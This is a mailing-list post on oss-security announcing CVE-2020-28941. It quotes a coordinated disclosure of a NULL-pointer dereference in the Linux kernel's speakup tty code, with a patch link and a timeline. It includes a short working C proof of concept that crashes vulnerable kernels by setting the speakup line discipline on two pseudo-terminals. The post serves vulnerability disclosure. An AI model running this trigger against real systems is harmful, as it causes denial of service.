Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20201119162507.GA4986@suse.de>
Date: Thu, 19 Nov 2020 17:25:08 +0100
From: Marcus Meissner <meissner@...e.de>
To: oss-security@...ts.openwall.com
Cc: nopitydays@...il.com
Subject: Re: Linux kernel NULL-ptr deref bug in
 spk_ttyio_ldisc_close

Hi,

Mitre has assigned CVE-2020-28941 to this issue.

Ciao, Marcus
On Thu, Nov 19, 2020 at 10:46:59AM +0800, Shisong Qin wrote:
> Hi,
> 
> Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
> Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
> function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
> and set "speakup_tty" to NULL. However, if we open two tty device and use
> tiocsetd() to set them as "speakup_tty" and close them in turn, the first
> close would set "speakup_tty" to NULL, and in the second close would try to
> dereference the "speakup_tty", leading to a NULL-ptr deref crash.
> 
> This bug could be reproduced in the longterm 4.19 Linux kernel with
> CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
> To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
> required in config, and here is a simple poc:
> 
> #define _GNU_SOURCE
> 
> #include <dirent.h>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <signal.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/prctl.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <time.h>
> #include <unistd.h>
> 
> int main(void) {
>     int disc = 0x1a;
>     int fd = open("/dev/ptmx", O_RDWR, 0);
>     ioctl(fd, 0x5423, &disc);
>     int fd2 = open("/dev/ptmx", O_RDWR, 0);
>     ioctl(fd2, 0x5423, &disc);
>     return 0;
> }
> 
> After the process return, it seems the automated calling to release would
> trigger the NULL-ptr deref bug.
> 
> Here is the commit to patch this BUG:
> https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1
> 
> Timeline:
> * 2020/11/10 - Vulnerability reported to security@...nel.org
> * 2020/11/11 - Vulnerability confirmed, and reported to
> linux-distros@...openwall.org.
> * 2020/11/19 - Vulnerability opened.
> 
> Thanks,
> Shisong Qin and Bodong Zhao, Tsinghua University

-- 
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <meissner@...e.de>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.